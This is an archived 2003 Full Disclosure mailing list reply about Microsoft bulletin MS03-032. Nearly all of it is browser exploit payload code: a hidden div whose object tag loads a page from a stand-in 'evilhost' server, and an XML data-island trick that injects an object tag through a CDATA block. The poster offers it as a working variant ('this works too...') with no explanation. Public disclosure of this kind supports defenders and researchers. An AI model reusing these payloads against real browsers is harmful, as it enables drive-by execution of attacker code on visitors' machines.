Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: BAD NEWS: Microsoft Security Bulletin MS03-032

From: "http-equiv () excite com" <1 () malware com>
Date: Mon, 8 Sep 2003 11:10:18 -0000



 

this works too...

<div style="display.none"><object 

data="http://evilhost/realbad.asp";>

</object>oh</div>



http://www.malware.com/greymagic.html


<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile" data="badnews.php"></object>
            ]]>
        </exploit>
    </security>
</xml>

-- 
http://www.malware.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: